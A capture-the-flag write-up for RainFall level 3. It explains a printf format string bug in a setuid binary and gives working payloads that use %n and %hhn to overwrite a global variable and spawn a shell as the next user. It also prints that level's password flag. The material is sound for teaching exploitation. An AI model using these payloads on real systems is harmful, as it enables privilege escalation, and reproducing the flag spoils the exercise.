# Level 3

## Vulnerability
Format string vulnerability in `printf()` with uninitialized variable check.

## Code Analysis

As in level2, we can find an executable waiting for an input, print it and quit after press enter
```
level3@RainFall:~$ ls -l
total 8
-rwsr-s---+ 1 level4 users 5366 Mar  6  2016 level3
level3@RainFall:~$ ./level3
AAAA
AAAA
level3@RainFall:~$

```



After analyze the source.c we can see that the `main()` function call a function named `v()`.  

```c
int m;  // Global variable at 0x0804988c

void v(void) {
    char buffer[520];
    fgets(buffer, 512, stdin);
    printf(buffer);  // FORMAT STRING BUG!
    
    if (m == 0x40) {  // Need m = 64
        system("/bin/sh");
    }
}
```

## Solution Steps

1. **Find variable address**
```bash
   objdump -t level3 | grep " m"
   0804988c g     O .bss    00000004    m
```

2. **Exploit format string**
   - Write to address `0x0804988c`
   - Set value to `0x40` (64 in decimal)
   - Use `%n` to write number of printed characters

3. **Method 1: Write full value (64 bytes)**

First we need to print the memory until we reach the address of the variable we wish to modify :

```bash
    level3@RainFall:~$ python -c 'print "AAAA %x %x %x %x %x %x %x %x %x %x"' | ./level3
    AAAA 200 b7fd1ac0 b7ff37d0 41414141 20782520 25207825 78252078 20782520 25207825 78252078
    level3@RainFall:~$ 

   (python -c 'print "\x8c\x98\x04\x08" + "A"*60 + "%4$n"'; cat) | ./level3
```
   - `\x8c\x98\x04\x08`: Address of `m` (little-endian)
   - `"A"*60`: Padding (4 + 60 = 64 bytes total)
   - `%4$n`: Write 64 to 4th argument (our address)

4. **Method 2: Write byte value**
```bash
   (python -c 'print "\x8c\x98\x04\x08" + "%60c%4$hhn"'; cat) | ./level3
```
   - `%60c`: Print 60 characters (4 + 60 = 64)
   - `%4$hhn`: Write single byte (64) to address

5. **Get flag**
```bash
   whoami
   level4
   cat /home/user/level4/.pass
   b209ea91ad69ef36f2cf0fcbbc24c739fd10464cf545b20bea8572ebdc3c36fa
```

## Key Concept
Format string vulnerability allows arbitrary memory write using `%n` specifier, which writes the number of characters printed so far to the target address.
